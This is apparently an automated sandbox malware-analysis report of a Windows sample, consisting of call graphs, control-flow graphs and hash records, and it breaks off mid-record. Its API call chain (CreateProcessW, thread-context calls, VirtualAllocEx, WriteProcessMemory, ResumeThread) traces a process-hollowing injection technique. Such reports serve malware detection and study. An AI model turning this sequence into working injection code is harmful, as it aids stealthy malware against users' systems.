36948->36957 36949 535c78e 36950 535c876 36949->36950 36960 535bb72 Wow64SetThreadContext 36949->36960 36961 535bb78 Wow64SetThreadContext 36949->36961 36962 535be00 ResumeThread 36950->36962 36963 535bdf8 ResumeThread 36950->36963 36951 535c933 36951->36935 36952->36948 36953->36948 36954->36946 36955->36946 36956->36948 36957->36948 36958->36949 36959->36949 36960->36950 36961->36950 36962->36951 36963->36951 36966 535bf70 36964->36966 36965 535ab94 CreateProcessW 36967 535c17a 36965->36967 36966->36965 36969 535c274 36967->36969 36994 535aba0 36967->36994 36998 535abb8 36969->36998 36971 535c354 37001 535bd40 36971->37001 37005 535bd38 36971->37005 36972 535c471 37009 535bc50 36972->37009 37013 535bc48 36972->37013 36973 535c555 36974 535c750 36973->36974 36982 535bc50 WriteProcessMemory 36973->36982 36983 535bc48 WriteProcessMemory 36973->36983 36984 535bc50 WriteProcessMemory 36974->36984 36985 535bc48 WriteProcessMemory 36974->36985 36975 535c78e 36976 535c876 36975->36976 37017 535bb78 36975->37017 37021 535bb72 36975->37021 37025 535bdf8 36976->37025 37029 535be00 36976->37029 36977 535c933 36977->36935 36982->36973 36983->36973 36984->36975 36985->36975 36991 535caa0 CreateProcessW 36990->36991 36993 535cbf1 36991->36993 36995 535ccd0 Wow64GetThreadContext 36994->36995 36997 535cd4a 36995->36997 36997->36969 36999 535cd88 ReadProcessMemory 36998->36999 37000 535ce08 36999->37000 37000->36971 37002 535bd80 VirtualAllocEx 37001->37002 37004 535bdbd 37002->37004 37004->36972 37006 535bd40 VirtualAllocEx 37005->37006 37008 535bdbd 37006->37008 37008->36972 37010 535bc98 WriteProcessMemory 37009->37010 37012 535bcef 37010->37012 37012->36973 37014 535bc50 WriteProcessMemory 37013->37014 37016 535bcef 37014->37016 37016->36973 37018 535bbbd Wow64SetThreadContext 37017->37018 37020 535bc05 37018->37020 37020->36976 37022 535bb78 Wow64SetThreadContext 37021->37022 37024 535bc05 37022->37024 37024->36976 37026 535be00 ResumeThread 37025->37026 37028 535be71 37026->37028 37028->36977 37030 535be40 ResumeThread 37029->37030 37032 535be71 37030->37032 37032->36977 37079 5354050 37080 5354092 37079->37080 37082 5354099 37079->37082 37081 53540ea CallWindowProcW 37080->37081 37080->37082 37081->37082 37033 11bd01c 37034 11bd034 37033->37034 37035 11bd08e 37034->37035 37037 5351bd1 37034->37037 37038 5351be7 37037->37038 37040 5351d1d 37037->37040 37038->37035 37042 5351d33 37040->37042 37041 5351e76 37042->37041 37044 5351b08 37042->37044 37047 5351b38 SetWindowLongW 37044->37047 37048 5351b20 37047->37048 37048->37041 37070 6179680 37074 61796e5 37070->37074 37071 6177a30 PeekMessageW 37071->37074 37072 6179b48 WaitMessage 37072->37074 37074->37071 37074->37072 37075 6179732 37074->37075 37076 61792ac 37074->37076 37077 617a3e8 DispatchMessageW 37076->37077 37078 617a454 37077->37078 37078->37074 37083 6171a70 37084 6171a8a 37083->37084 37086 6171a9d 37083->37086 37089 6170760 37084->37089 37087 6171ae3 37086->37087 37088 6170760 OleInitialize 37086->37088 37088->37087 37090 617076b 37089->37090 37091 6171b0e 37090->37091 37094 6171b38 37090->37094 37100 6171b48 37090->37100 37091->37086 37095 6171e50 37094->37095 37096 6171b70 37094->37096 37095->37091 37097 6171b79 37096->37097 37106 61707fc 37096->37106 37097->37091 37099 6171b9c 37101 6171e50 37100->37101 37102 6171b70 37100->37102 37101->37091 37103 6171b79 37102->37103 37104 61707fc OleInitialize 37102->37104 37103->37091 37105 6171b9c 37104->37105 37108 6170807 37106->37108 37107 6171e93 37107->37099 37108->37107 37110 6170818 37108->37110 37111 6171ec8 OleInitialize 37110->37111 37112 6171f2c 37111->37112 37112->37107 37049 128d620 DuplicateHandle 37050 128d6b6 37049->37050 37051 128fee0 37052 128ff07 37051->37052 37056 6170287 37052->37056 37061 61702ab 37052->37061 37053 128ff2b 37057 61702ac 37056->37057 37058 617028d 37056->37058 37066 6170563 PostMessageW 37057->37066 37068 6170588 PostMessageW 37057->37068 37058->37053 37062 61702be 37061->37062 37064 6170563 PostMessageW 37062->37064 37065 6170588 PostMessageW 37062->37065 37063 61702e1 37063->37053 37064->37063 37065->37063 37067 61705f4 37066->37067 37067->37058 37069 61705f4 37068->37069 37069->37058 37123 128ac50 37124 128ac5f 37123->37124 37127 128ad48 37123->37127 37132 128ad37 37123->37132 37128 128ad59 37127->37128 37129 128ad7c 37127->37129 37128->37129 37130 128af80 GetModuleHandleW 37128->37130 37129->37124 37131 128afad 37130->37131 37131->37124 37133 128ad7c 37132->37133 37134 128ad59 37132->37134 37133->37124 37134->37133 37135 128af80 GetModuleHandleW 37134->37135 37136 128afad 37135->37136 37136->37124 37137 535ce48 37138 535ce5b 37137->37138 37141 535ac7c 37138->37141 37140 535cf28 37142 535ac87 37141->37142 37143 535fbf2 37142->37143 37144 5351b08 SetWindowLongW 37142->37144 37143->37140 37144->37143

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 22 6179680-61796e3 23 61796e5-617970f 22->23 24 6179712-6179730 22->24 23->24 29 6179732-6179734 24->29 30 6179739-6179770 24->30 32 6179bf2-6179c07 29->32 34 6179776-617978a 30->34 35 6179ba1 30->35 36 617978c-61797b6 34->36 37 61797b9-61797d8 34->37 38 6179ba6-6179bbc 35->38 36->37 44 61797f0-61797f2 37->44 45 61797da-61797e0 37->45 38->32 48 61797f4-617980c 44->48 49 6179811-617981a 44->49 46 61797e4-61797e6 45->46 47 61797e2 45->47 46->44 47->44 48->38 51 6179822-6179829 49->51 52 6179833-617983a 51->52 53 617982b-6179831 51->53 55 6179844 52->55 56 617983c-6179842 52->56 54 6179847-6179864 call 6177a30 53->54 59 617986a-6179871 54->59 60 61799b9-61799bd 54->60 55->54 56->54 59->35 61 6179877-61798b4 59->61 62 61799c3-61799c7 60->62 63 6179b8c-6179b9f 60->63 71 6179b82-6179b86 61->71 72 61798ba-61798bf 61->72 64 61799e1-61799ea 62->64 65 61799c9-61799dc 62->65 63->38 67 61799ec-6179a16 64->67 68 6179a19-6179a20 64->68 65->38 67->68 69 6179a26-6179a2d 68->69 70 6179abf-6179ad4 68->70 73 6179a2f-6179a59 69->73 74 6179a5c-6179a7e 69->74 70->71 86 6179ada-6179adc 70->86 71->51 71->63 75 61798f1-6179906 call 6179284 72->75 76 61798c1-61798cf call 617926c 72->76 73->74 74->70 109 6179a80-6179a8a 74->109 84 617990b-617990f 75->84 76->75 89 61798d1-61798ef call 6179278 76->89 90 6179911-6179923 call 6179290 84->90 91 6179980-617998d 84->91 87 6179ade-6179b17 86->87 88 6179b29-6179b46 call 6177a30 86->88 103 6179b20-6179b27 87->103 104 6179b19-6179b1f 87->104 88->71 106 6179b48-6179b74 WaitMessage 88->106 89->84 114 6179925-6179955 90->114 115 6179963-617997b 90->115 91->71 107 6179993-617999d call 61792a0 91->107 103->71 104->103 111 6179b76 106->111 112 6179b7b 106->112 119 617999f-61799a2 call 61792ac 107->119 120 61799ac-61799b4 call 61792b8 107->120 122 6179aa2-6179abd 109->122 123 6179a8c-6179a92 109->123 111->112 112->71 130 6179957 114->130 131 617995c 114->131 115->38 126 61799a7 119->126 120->71 122->70 122->109 127 6179a96-6179a98 123->127 128 6179a94 123->128 126->71 127->122 128->122 130->131 131->115
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_6170000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: 6ec79c9a65e009155a3bb37e4e3240a8f321d261d4c5ef49cfee271500aee440
                                                                                                                                  • Instruction ID: a1de849486eb3fcdc60cb01f70d098dfaa767f0197f0a48c6b924988af0cb072
                                                                                                                                  • Opcode Fuzzy Hash: 6ec79c9a65e009155a3bb37e4e3240a8f321d261d4c5ef49cfee271500aee440
                                                                                                                                  • Instruction Fuzzy Hash: 9FF11730E00209CFEB54DFA9C944B9DBBF1BF88314F158969E415AF2A5DB74A949CB80

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 134 535bf70-535bfa1 135 535bfa3 134->135 136 535bfa8-535c12e 134->136 135->136 143 535c155-535c19a call 535ab94 136->143 144 535c130-535c154 136->144 148 535c1c3-535c22d 143->148 149 535c19c-535c1b8 143->149 144->143 155 535c234-535c260 148->155 156 535c22f 148->156 149->148 158 535c2c1-535c2f3 call 535abac 155->158 159 535c262-535c26f call 535aba0 155->159 156->155 166 535c2f5-535c311 158->166 167 535c31c 158->167 162 535c274-535c294 159->162 164 535c296-535c2b2 162->164 165 535c2bd-535c2bf 162->165 164->165 168 535c31d-535c327 165->168 166->167 167->168 170 535c32e-535c374 call 535abb8 168->170 171 535c329 168->171 177 535c376-535c392 170->177 178 535c39d-535c3b6 170->178 171->170 177->178 179 535c40e-535c46c 178->179 180 535c3b8-535c3e4 call 535abc4 178->180 258 535c46f call 535bd40 179->258 259 535c46f call 535bd38 179->259 185 535c3e6-535c402 180->185 186 535c40d 180->186 185->186 186->179 190 535c471-535c486 191 535c488-535c499 190->191 192 535c49b-535c49d 190->192 194 535c4a3-535c4b7 191->194 192->194 195 535c4f4-535c50b 194->195 196 535c4b9-535c4f3 194->196 197 535c534-535c550 195->197 198 535c50d-535c529 195->198 196->195 256 535c553 call 535bc50 197->256 257 535c553 call 535bc48 197->257 198->197 200 535c555-535c575 202 535c577-535c593 200->202 203 535c59e-535c5d3 200->203 202->203 207 535c72b-535c74a 203->207 208 535c750-535c789 207->208 209 535c5d8-535c65c 207->209 262 535c78c call 535bc50 208->262 263 535c78c call 535bc48 208->263 218 535c720-535c725 209->218 219 535c662-535c6d1 209->219 213 535c78e-535c7ae 215 535c7d7-535c80a 213->215 216 535c7b0-535c7cc 213->216 222 535c814-535c827 215->222 223 535c80c-535c813 215->223 216->215 218->207 260 535c6d4 call 535bc50 219->260 261 535c6d4 call 535bc48 219->261 224 535c82e-535c859 222->224 225 535c829 222->225 223->222 230 535c8c3-535c8f5 call 535abd0 224->230 231 535c85b-535c871 224->231 225->224 238 535c8f7-535c913 230->238 239 535c91e 230->239 264 535c874 call 535bb72 231->264 265 535c874 call 535bb78 231->265 233 535c6d6-535c6f6 236 535c71f 233->236 237 535c6f8-535c714 233->237 235 535c876-535c896 240 535c8bf-535c8c1 235->240 241 535c898-535c8b4 235->241 236->218 237->236 238->239 242 535c91f-535c92e 239->242 240->242 241->240 266 535c931 call 535be00 242->266 267 535c931 call 535bdf8 242->267 246 535c933-535c953 249 535c955-535c971 246->249 250 535c97c-535ca85 246->250 249->250 256->200 257->200 258->190 259->190 260->233 261->233 262->213 263->213 264->235 265->235 266->246 267->246
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 963392458-3887548279
                                                                                                                                  • Opcode ID: e1af4c3ad2744d26ed53832762a320ac881263ee394701cb7709d9c1dc2f3651
                                                                                                                                  • Instruction ID: 4e38edf131e9425f06ad4a7a81306907a64825683bdffd64baf833d9f1244d99
                                                                                                                                  • Opcode Fuzzy Hash: e1af4c3ad2744d26ed53832762a320ac881263ee394701cb7709d9c1dc2f3651
                                                                                                                                  • Instruction Fuzzy Hash: 0552E074E012298FDB68DF65C954BEDBBB2BF89300F1091EA9409AB290DB745E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 9305e0fa206caf31218f4d7a4d679226a049dd4f33a3d9a71f739910186d7e5c
                                                                                                                                  • Instruction ID: 63a6c0d2683318ef072320176b9022f276d18deabca93626bc0a64ad4f7070aa
                                                                                                                                  • Opcode Fuzzy Hash: 9305e0fa206caf31218f4d7a4d679226a049dd4f33a3d9a71f739910186d7e5c
                                                                                                                                  • Instruction Fuzzy Hash: DC32F274E01229CFDB68DF65C944BEDBBB2BF89300F1091EA9409AB294DB745E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b4bad92ce2f37c407da811adc67cb3371a8aa7d8f12d378636c32ceefed5269f
                                                                                                                                  • Instruction ID: 086a040a2b1a0befa6c145e68a39b109d7780fa915dde2522aff8449af26975a
                                                                                                                                  • Opcode Fuzzy Hash: b4bad92ce2f37c407da811adc67cb3371a8aa7d8f12d378636c32ceefed5269f
                                                                                                                                  • Instruction Fuzzy Hash: A4A1EF74E012198FDB14DFAAD584AADFBF2FF48310F5491A9D808AB356DB34A981CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0128D456
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0128D493
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0128D4D0
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0128D529
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_1280000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: 6b17e924dfb7f89317357f6ff9ffffeaba51f4b8a8b3d9a544db0da9a17203f3
                                                                                                                                  • Instruction ID: e5dfd8b9e5e72249ddc09a69c7098f46070f9dd09868ad1d60c567a1b5c366e8
                                                                                                                                  • Opcode Fuzzy Hash: 6b17e924dfb7f89317357f6ff9ffffeaba51f4b8a8b3d9a544db0da9a17203f3
                                                                                                                                  • Instruction Fuzzy Hash: F9514BB090120ACFEB54DFAAD548BDEBBF1FF88314F208459D519AB390D7346944CB65

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 268 128ad48-128ad57 269 128ad59-128ad66 call 128a0a0 268->269 270 128ad83-128ad87 268->270 277 128ad68 269->277 278 128ad7c 269->278 271 128ad89-128ad93 270->271 272 128ad9b-128addc 270->272 271->272 279 128ade9-128adf7 272->279 280 128adde-128ade6 272->280 323 128ad6e call 128afe0 277->323 324 128ad6e call 128afd0 277->324 278->270 282 128adf9-128adfe 279->282 283 128ae1b-128ae1d 279->283 280->279 281 128ad74-128ad76 281->278 284 128aeb8-128af78 281->284 285 128ae09 282->285 286 128ae00-128ae07 call 128a0ac 282->286 287 128ae20-128ae27 283->287 318 128af7a-128af7d 284->318 319 128af80-128afab GetModuleHandleW 284->319 290 128ae0b-128ae19 285->290 286->290 288 128ae29-128ae31 287->288 289 128ae34-128ae3b 287->289 288->289 293 128ae48-128ae4a call 128a0bc 289->293 294 128ae3d-128ae45 289->294 290->287 298 128ae4f-128ae51 293->298 294->293 299 128ae5e-128ae63 298->299 300 128ae53-128ae5b 298->300 302 128ae81-128ae8e 299->302 303 128ae65-128ae6c 299->303 300->299 308 128ae90-128aeae 302->308 309 128aeb1-128aeb7 302->309 303->302 304 128ae6e-128ae7e call 128a0cc call 128a0dc 303->304 304->302 308->309 318->319 320 128afad-128afb3 319->320 321 128afb4-128afc8 319->321 320->321 323->281 324->281
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0128AF9E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_1280000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  • Opcode ID: b979457315230157b842a9c84977f5127b45e499629e6f8ce4b5ff6b20e40626
                                                                                                                                  • Instruction ID: 0c2ecfaf9a4efb3a686054b4f2c5d6e62b542a9eec11e31edd7bbdbfa480af24
                                                                                                                                  • Opcode Fuzzy Hash: b979457315230157b842a9c84977f5127b45e499629e6f8ce4b5ff6b20e40626
                                                                                                                                  • Instruction Fuzzy Hash: 12815A70A11B068FE724EF29D05579ABBF1FF48300F008A2ED586DBA80DB75E845CB91

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 325 535ab94-535cb19 327 535cb21-535cb28 325->327 328 535cb1b-535cb1e 325->328 329 535cb33-535cb49 327->329 330 535cb2a-535cb30 327->330 328->327 331 535cb54-535cbef CreateProcessW 329->331 332 535cb4b-535cb51 329->332 330->329 334 535cbf1-535cbf7 331->334 335 535cbf8-535cc6c 331->335 332->331 334->335 343 535cc7e-535cc85 335->343 344 535cc6e-535cc74 335->344 345 535cc87-535cc96 343->345 346 535cc9c 343->346 344->343 345->346 347 535cc9d 346->347 347->347
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,00000000,?), ref: 0535CBDC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 3da53650e5ca7dd654c8ce326e409804600e9725466a71800c4457df70f85a7a
                                                                                                                                  • Instruction ID: 48e66c0f3bfbde6b0fd4102096c5f358ea897b4e7151f40f257e46a5ea2c4e18
                                                                                                                                  • Opcode Fuzzy Hash: 3da53650e5ca7dd654c8ce326e409804600e9725466a71800c4457df70f85a7a
                                                                                                                                  • Instruction Fuzzy Hash: C951157190132DDFDB24CFA9C940BDDBBB6BF48314F1080AAE909A7250D7759A88CF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 349 535ca96-535cb19 350 535cb21-535cb28 349->350 351 535cb1b-535cb1e 349->351 352 535cb33-535cb49 350->352 353 535cb2a-535cb30 350->353 351->350 354 535cb54-535cbef CreateProcessW 352->354 355 535cb4b-535cb51 352->355 353->352 357 535cbf1-535cbf7 354->357 358 535cbf8-535cc6c 354->358 355->354 357->358 366 535cc7e-535cc85 358->366 367 535cc6e-535cc74 358->367 368 535cc87-535cc96 366->368 369 535cc9c 366->369 367->366 368->369 370 535cc9d 369->370 370->370
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,00000000,?), ref: 0535CBDC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 070d76408e3310bdad60e506674d027a774a9c4793cf215ccf348c3edb9cd66d
                                                                                                                                  • Instruction ID: 0ec0b37a7071e84037c5e231f5970c6baa303a8daad548e54de523bf8db17192
                                                                                                                                  • Opcode Fuzzy Hash: 070d76408e3310bdad60e506674d027a774a9c4793cf215ccf348c3edb9cd66d
                                                                                                                                  • Instruction Fuzzy Hash: E251247590132DDFDB24CFA9C980BDDBBB2BF48314F1081AAE908A7250D7759A89CF51

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 372 53518f0-5351956 373 5351961-5351968 372->373 374 5351958-535195e 372->374 375 5351973-5351a12 CreateWindowExW 373->375 376 535196a-5351970 373->376 374->373 378 5351a14-5351a1a 375->378 379 5351a1b-5351a53 375->379 376->375 378->379 383 5351a55-5351a58 379->383 384 5351a60 379->384 383->384 385 5351a61 384->385 385->385
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05351A02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 033389dfb0cd6cc90a7ef92f0931aa5fd7d320a58db6a4f2899b46589cdc2641
                                                                                                                                  • Instruction ID: 469f6fd596bc73a7256afccbb7ccd96c74c190cda2df8012683ae8f5a4223ef7
                                                                                                                                  • Opcode Fuzzy Hash: 033389dfb0cd6cc90a7ef92f0931aa5fd7d320a58db6a4f2899b46589cdc2641
                                                                                                                                  • Instruction Fuzzy Hash: 1941BFB1D10349DFDB14CF99C984ADEBBB5BF88310F24812AE819AB210D7B59985CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 386 128590d-12859d9 CreateActCtxA 388 12859db-12859e1 386->388 389 12859e2-1285a3c 386->389 388->389 396 1285a4b-1285a4f 389->396 397 1285a3e-1285a41 389->397 398 1285a60 396->398 399 1285a51-1285a5d 396->399 397->396 401 1285a61 398->401 399->398 401->401
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 012859C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_1280000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: e245a047d99368cfadbca3160144863966353a29883112bde82381864e78b00c
                                                                                                                                  • Instruction ID: db0c15d3b64ed17c1b28be15c0f91aac2b8bc07d611dfd09e16f370993ee2113
                                                                                                                                  • Opcode Fuzzy Hash: e245a047d99368cfadbca3160144863966353a29883112bde82381864e78b00c
                                                                                                                                  • Instruction Fuzzy Hash: 7041CF70C11719CFDB24DFA9C8847DEBBB5BF89304F20815AD508AB261DB756946CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 402 1284248-12859d9 CreateActCtxA 405 12859db-12859e1 402->405 406 12859e2-1285a3c 402->406 405->406 413 1285a4b-1285a4f 406->413 414 1285a3e-1285a41 406->414 415 1285a60 413->415 416 1285a51-1285a5d 413->416 414->413 418 1285a61 415->418 416->415 418->418
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 012859C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_1280000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: 92800ff99309cb47f869fae95e2b449039d5398541240c6b70b157a913b4ad0c
                                                                                                                                  • Instruction ID: de7d1c99767c32f793664b005ec430cb0ab3e19faed7761cb1c6674ab7b5ad64
                                                                                                                                  • Opcode Fuzzy Hash: 92800ff99309cb47f869fae95e2b449039d5398541240c6b70b157a913b4ad0c
                                                                                                                                  • Instruction Fuzzy Hash: C941CF70C1171DCBDB24DFAAC884B9EBBF5BF49704F20806AD508AB251DB756946CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 419 5354050-535408c 420 5354092-5354097 419->420 421 535413c-535415c 419->421 422 5354099-53540d0 420->422 423 53540ea-5354122 CallWindowProcW 420->423 427 535415f-535416c 421->427 429 53540d2-53540d8 422->429 430 53540d9-53540e8 422->430 425 5354124-535412a 423->425 426 535412b-535413a 423->426 425->426 426->427 429->430 430->427
                                                                                                                                  APIs
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05354111
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                  • Opcode ID: 1ffcb73ed20821d3b289a1c584c0bca953d170273d8f0a474ff8a3bd249f4ead
                                                                                                                                  • Instruction ID: ba411e25a6daf9170152d6840a883de2461bd18e9485ecd703cefee7ff3bbd10
                                                                                                                                  • Opcode Fuzzy Hash: 1ffcb73ed20821d3b289a1c584c0bca953d170273d8f0a474ff8a3bd249f4ead
                                                                                                                                  • Instruction Fuzzy Hash: 9A4108B9900309CFDB14CF99C848EAAFBF5FB88324F248459D519AB321D775A945CFA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 433 535bc48-535bc9e 436 535bca0-535bcac 433->436 437 535bcae-535bced WriteProcessMemory 433->437 436->437 439 535bcf6-535bd26 437->439 440 535bcef-535bcf5 437->440 440->439
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0535BCE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 74dd87d89ee10002c172254358e77970aba888927dec30ba96d1c03ec4f9d41b
                                                                                                                                  • Instruction ID: dbfa98f5b6053b197bf4529f9a0ec031dfdebf931f3e4b00219cf39926f66b07
                                                                                                                                  • Opcode Fuzzy Hash: 74dd87d89ee10002c172254358e77970aba888927dec30ba96d1c03ec4f9d41b
                                                                                                                                  • Instruction Fuzzy Hash: ED215771900319DFDB10CFAAC881BDEBBF5FF88320F14842AE959A7240C7789954CBA4

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 444 535bc50-535bc9e 446 535bca0-535bcac 444->446 447 535bcae-535bced WriteProcessMemory 444->447 446->447 449 535bcf6-535bd26 447->449 450 535bcef-535bcf5 447->450 450->449
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0535BCE0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 5ee17780be8f84ee1512ae77e6afdbea55feb183d3d7ebe520823e48858b2530
